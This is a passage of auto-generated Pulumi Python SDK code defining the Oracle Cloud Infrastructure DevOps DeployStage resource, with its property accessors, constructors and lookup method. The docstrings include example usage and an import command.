"""
(Updatable) Maximum usable memory for the Function (in MB).
"""
return pulumi.get(self, "max_memory_in_mbs")
@max_memory_in_mbs.setter
def max_memory_in_mbs(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_memory_in_mbs", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="okeClusterDeployEnvironmentId")
def oke_cluster_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Kubernetes cluster environment OCID for deployment.
"""
return pulumi.get(self, "oke_cluster_deploy_environment_id")
@oke_cluster_deploy_environment_id.setter
def oke_cluster_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "oke_cluster_deploy_environment_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="rollbackPolicy")
def rollback_policy(self) -> Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]:
"""
(Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
"""
return pulumi.get(self, "rollback_policy")
@rollback_policy.setter
def rollback_policy(self, value: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]):
pulumi.set(self, "rollback_policy", value)
@property
@pulumi.getter(name="rolloutPolicy")
def rollout_policy(self) -> Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]:
"""
(Updatable) Description of rollout policy for load balancer traffic shift stage.
"""
return pulumi.get(self, "rollout_policy")
@rollout_policy.setter
def rollout_policy(self, value: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]):
pulumi.set(self, "rollout_policy", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the deployment stage.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
@property
@pulumi.getter(name="trafficShiftTarget")
def traffic_shift_target(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Specifies the target or destination backend set.
"""
return pulumi.get(self, "traffic_shift_target")
@traffic_shift_target.setter
def traffic_shift_target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "traffic_shift_target", value)
@property
@pulumi.getter(name="waitCriteria")
def wait_criteria(self) -> Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]:
"""
(Updatable) Specifies wait criteria for the Wait stage.
"""
return pulumi.get(self, "wait_criteria")
@wait_criteria.setter
def wait_criteria(self, value: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]):
pulumi.set(self, "wait_criteria", value)
class DeployStage(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
approval_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']]] = None,
blue_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']]] = None,
compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_artifact_id: Optional[pulumi.Input[str]] = None,
deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
deploy_stage_predecessor_collection: Optional[pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']]] = None,
deploy_stage_type: Optional[pulumi.Input[str]] = None,
deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
green_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']]] = None,
is_async: Optional[pulumi.Input[bool]] = None,
is_validation_enabled: Optional[pulumi.Input[bool]] = None,
kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_config: Optional[pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']]] = None,
max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
rollback_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']]] = None,
rollout_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']]] = None,
traffic_shift_target: Optional[pulumi.Input[str]] = None,
wait_criteria: Optional[pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']]] = None,
__props__=None):
"""
This resource provides the Deploy Stage resource in Oracle Cloud Infrastructure Devops service.
Creates a new deployment stage.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_deploy_stage = oci.devops.DeployStage("testDeployStage",
deploy_pipeline_id=oci_devops_deploy_pipeline["test_deploy_pipeline"]["id"],
deploy_stage_predecessor_collection=oci.devops.DeployStageDeployStagePredecessorCollectionArgs(
items=[oci.devops.DeployStageDeployStagePredecessorCollectionItemArgs(
id=var["deploy_stage_deploy_stage_predecessor_collection_items_id"],
)],
),
deploy_stage_type=var["deploy_stage_deploy_stage_type"],
approval_policy=oci.devops.DeployStageApprovalPolicyArgs(
approval_policy_type=var["deploy_stage_approval_policy_approval_policy_type"],
number_of_approvals_required=var["deploy_stage_approval_policy_number_of_approvals_required"],
),
blue_backend_ips=oci.devops.DeployStageBlueBackendIpsArgs(
items=var["deploy_stage_blue_backend_ips_items"],
),
compute_instance_group_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
config=var["deploy_stage_config"],
defined_tags={
"foo-namespace.bar-key": "value",
},
deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
deploy_artifact_ids=var["deploy_stage_deploy_artifact_ids"],
deployment_spec_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
description=var["deploy_stage_description"],
display_name=var["deploy_stage_display_name"],
docker_image_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
failure_policy=oci.devops.DeployStageFailurePolicyArgs(
policy_type=var["deploy_stage_failure_policy_policy_type"],
failure_count=var["deploy_stage_failure_policy_failure_count"],
failure_percentage=var["deploy_stage_failure_policy_failure_percentage"],
),
freeform_tags={
"bar-key": "value",
},
function_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
function_timeout_in_seconds=var["deploy_stage_function_timeout_in_seconds"],
green_backend_ips=oci.devops.DeployStageGreenBackendIpsArgs(
items=var["deploy_stage_green_backend_ips_items"],
),
is_async=var["deploy_stage_is_async"],
is_validation_enabled=var["deploy_stage_is_validation_enabled"],
kubernetes_manifest_deploy_artifact_ids=var["deploy_stage_kubernetes_manifest_deploy_artifact_ids"],
load_balancer_config=oci.devops.DeployStageLoadBalancerConfigArgs(
backend_port=var["deploy_stage_load_balancer_config_backend_port"],
listener_name=oci_load_balancer_listener["test_listener"]["name"],
load_balancer_id=oci_load_balancer_load_balancer["test_load_balancer"]["id"],
),
max_memory_in_mbs=var["deploy_stage_max_memory_in_mbs"],
namespace=var["deploy_stage_namespace"],
oke_cluster_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
rollback_policy=oci.devops.DeployStageRollbackPolicyArgs(
policy_type=var["deploy_stage_rollback_policy_policy_type"],
),
rollout_policy=oci.devops.DeployStageRolloutPolicyArgs(
policy_type=var["deploy_stage_rollout_policy_policy_type"],
batch_count=var["deploy_stage_rollout_policy_batch_count"],
batch_delay_in_seconds=var["deploy_stage_rollout_policy_batch_delay_in_seconds"],
batch_percentage=var["deploy_stage_rollout_policy_batch_percentage"],
ramp_limit_percent=var["deploy_stage_rollout_policy_ramp_limit_percent"],
),
traffic_shift_target=var["deploy_stage_traffic_shift_target"],
wait_criteria=oci.devops.DeployStageWaitCriteriaArgs(
wait_duration=var["deploy_stage_wait_criteria_wait_duration"],
wait_type=var["deploy_stage_wait_criteria_wait_type"],
))
```
## Import
DeployStages can be imported using the `id`, e.g.
```sh
$ pulumi import oci:devops/deployStage:DeployStage test_deploy_stage "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']] approval_policy: (Updatable) Specifies the approval policy.
:param pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
:param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
:param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
:param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
:param pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
:param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
:param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
:param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
:param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
:param pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
:param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
:param pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
:param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
:param pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
:param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
:param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
:param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
:param pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
:param pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
:param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
:param pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeployStageArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Deploy Stage resource in Oracle Cloud Infrastructure Devops service.
Creates a new deployment stage.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_deploy_stage = oci.devops.DeployStage("testDeployStage",
deploy_pipeline_id=oci_devops_deploy_pipeline["test_deploy_pipeline"]["id"],
deploy_stage_predecessor_collection=oci.devops.DeployStageDeployStagePredecessorCollectionArgs(
items=[oci.devops.DeployStageDeployStagePredecessorCollectionItemArgs(
id=var["deploy_stage_deploy_stage_predecessor_collection_items_id"],
)],
),
deploy_stage_type=var["deploy_stage_deploy_stage_type"],
approval_policy=oci.devops.DeployStageApprovalPolicyArgs(
approval_policy_type=var["deploy_stage_approval_policy_approval_policy_type"],
number_of_approvals_required=var["deploy_stage_approval_policy_number_of_approvals_required"],
),
blue_backend_ips=oci.devops.DeployStageBlueBackendIpsArgs(
items=var["deploy_stage_blue_backend_ips_items"],
),
compute_instance_group_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
config=var["deploy_stage_config"],
defined_tags={
"foo-namespace.bar-key": "value",
},
deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
deploy_artifact_ids=var["deploy_stage_deploy_artifact_ids"],
deployment_spec_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
description=var["deploy_stage_description"],
display_name=var["deploy_stage_display_name"],
docker_image_deploy_artifact_id=oci_devops_deploy_artifact["test_deploy_artifact"]["id"],
failure_policy=oci.devops.DeployStageFailurePolicyArgs(
policy_type=var["deploy_stage_failure_policy_policy_type"],
failure_count=var["deploy_stage_failure_policy_failure_count"],
failure_percentage=var["deploy_stage_failure_policy_failure_percentage"],
),
freeform_tags={
"bar-key": "value",
},
function_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
function_timeout_in_seconds=var["deploy_stage_function_timeout_in_seconds"],
green_backend_ips=oci.devops.DeployStageGreenBackendIpsArgs(
items=var["deploy_stage_green_backend_ips_items"],
),
is_async=var["deploy_stage_is_async"],
is_validation_enabled=var["deploy_stage_is_validation_enabled"],
kubernetes_manifest_deploy_artifact_ids=var["deploy_stage_kubernetes_manifest_deploy_artifact_ids"],
load_balancer_config=oci.devops.DeployStageLoadBalancerConfigArgs(
backend_port=var["deploy_stage_load_balancer_config_backend_port"],
listener_name=oci_load_balancer_listener["test_listener"]["name"],
load_balancer_id=oci_load_balancer_load_balancer["test_load_balancer"]["id"],
),
max_memory_in_mbs=var["deploy_stage_max_memory_in_mbs"],
namespace=var["deploy_stage_namespace"],
oke_cluster_deploy_environment_id=oci_devops_deploy_environment["test_deploy_environment"]["id"],
rollback_policy=oci.devops.DeployStageRollbackPolicyArgs(
policy_type=var["deploy_stage_rollback_policy_policy_type"],
),
rollout_policy=oci.devops.DeployStageRolloutPolicyArgs(
policy_type=var["deploy_stage_rollout_policy_policy_type"],
batch_count=var["deploy_stage_rollout_policy_batch_count"],
batch_delay_in_seconds=var["deploy_stage_rollout_policy_batch_delay_in_seconds"],
batch_percentage=var["deploy_stage_rollout_policy_batch_percentage"],
ramp_limit_percent=var["deploy_stage_rollout_policy_ramp_limit_percent"],
),
traffic_shift_target=var["deploy_stage_traffic_shift_target"],
wait_criteria=oci.devops.DeployStageWaitCriteriaArgs(
wait_duration=var["deploy_stage_wait_criteria_wait_duration"],
wait_type=var["deploy_stage_wait_criteria_wait_type"],
))
```
## Import
DeployStages can be imported using the `id`, e.g.
```sh
$ pulumi import oci:devops/deployStage:DeployStage test_deploy_stage "id"
```
:param str resource_name: The name of the resource.
:param DeployStageArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeployStageArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
approval_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']]] = None,
blue_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']]] = None,
compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_artifact_id: Optional[pulumi.Input[str]] = None,
deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
deploy_stage_predecessor_collection: Optional[pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']]] = None,
deploy_stage_type: Optional[pulumi.Input[str]] = None,
deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
green_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']]] = None,
is_async: Optional[pulumi.Input[bool]] = None,
is_validation_enabled: Optional[pulumi.Input[bool]] = None,
kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_config: Optional[pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']]] = None,
max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
rollback_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']]] = None,
rollout_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']]] = None,
traffic_shift_target: Optional[pulumi.Input[str]] = None,
wait_criteria: Optional[pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeployStageArgs.__new__(DeployStageArgs)
__props__.__dict__["approval_policy"] = approval_policy
__props__.__dict__["blue_backend_ips"] = blue_backend_ips
__props__.__dict__["compute_instance_group_deploy_environment_id"] = compute_instance_group_deploy_environment_id
__props__.__dict__["config"] = config
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deploy_artifact_id"] = deploy_artifact_id
__props__.__dict__["deploy_artifact_ids"] = deploy_artifact_ids
if deploy_pipeline_id is None and not opts.urn:
raise TypeError("Missing required property 'deploy_pipeline_id'")
__props__.__dict__["deploy_pipeline_id"] = deploy_pipeline_id
if deploy_stage_predecessor_collection is None and not opts.urn:
raise TypeError("Missing required property 'deploy_stage_predecessor_collection'")
__props__.__dict__["deploy_stage_predecessor_collection"] = deploy_stage_predecessor_collection
if deploy_stage_type is None and not opts.urn:
raise TypeError("Missing required property 'deploy_stage_type'")
__props__.__dict__["deploy_stage_type"] = deploy_stage_type
__props__.__dict__["deployment_spec_deploy_artifact_id"] = deployment_spec_deploy_artifact_id
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["docker_image_deploy_artifact_id"] = docker_image_deploy_artifact_id
__props__.__dict__["failure_policy"] = failure_policy
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["function_deploy_environment_id"] = function_deploy_environment_id
__props__.__dict__["function_timeout_in_seconds"] = function_timeout_in_seconds
__props__.__dict__["green_backend_ips"] = green_backend_ips
__props__.__dict__["is_async"] = is_async
__props__.__dict__["is_validation_enabled"] = is_validation_enabled
__props__.__dict__["kubernetes_manifest_deploy_artifact_ids"] = kubernetes_manifest_deploy_artifact_ids
__props__.__dict__["load_balancer_config"] = load_balancer_config
__props__.__dict__["max_memory_in_mbs"] = max_memory_in_mbs
__props__.__dict__["namespace"] = namespace
__props__.__dict__["oke_cluster_deploy_environment_id"] = oke_cluster_deploy_environment_id
__props__.__dict__["rollback_policy"] = rollback_policy
__props__.__dict__["rollout_policy"] = rollout_policy
__props__.__dict__["traffic_shift_target"] = traffic_shift_target
__props__.__dict__["wait_criteria"] = wait_criteria
__props__.__dict__["compartment_id"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["project_id"] = None
__props__.__dict__["state"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(DeployStage, __self__).__init__(
'oci:devops/deployStage:DeployStage',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
approval_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']]] = None,
blue_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_artifact_id: Optional[pulumi.Input[str]] = None,
deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
deploy_stage_predecessor_collection: Optional[pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']]] = None,
deploy_stage_type: Optional[pulumi.Input[str]] = None,
deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
green_backend_ips: Optional[pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']]] = None,
is_async: Optional[pulumi.Input[bool]] = None,
is_validation_enabled: Optional[pulumi.Input[bool]] = None,
kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
load_balancer_config: Optional[pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']]] = None,
max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
rollback_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']]] = None,
rollout_policy: Optional[pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
traffic_shift_target: Optional[pulumi.Input[str]] = None,
wait_criteria: Optional[pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']]] = None) -> 'DeployStage':
"""
Get an existing DeployStage resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['DeployStageApprovalPolicyArgs']] approval_policy: (Updatable) Specifies the approval policy.
:param pulumi.Input[pulumi.InputType['DeployStageBlueBackendIpsArgs']] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[str] compartment_id: The OCID of a compartment.
:param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
:param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
:param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
:param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
:param pulumi.Input[pulumi.InputType['DeployStageDeployStagePredecessorCollectionArgs']] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
:param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
:param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
:param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
:param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
:param pulumi.Input[pulumi.InputType['DeployStageFailurePolicyArgs']] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
:param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
:param pulumi.Input[pulumi.InputType['DeployStageGreenBackendIpsArgs']] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
:param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
:param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param pulumi.Input[pulumi.InputType['DeployStageLoadBalancerConfigArgs']] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
:param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
:param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
:param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[pulumi.InputType['DeployStageRollbackPolicyArgs']] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
:param pulumi.Input[pulumi.InputType['DeployStageRolloutPolicyArgs']] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
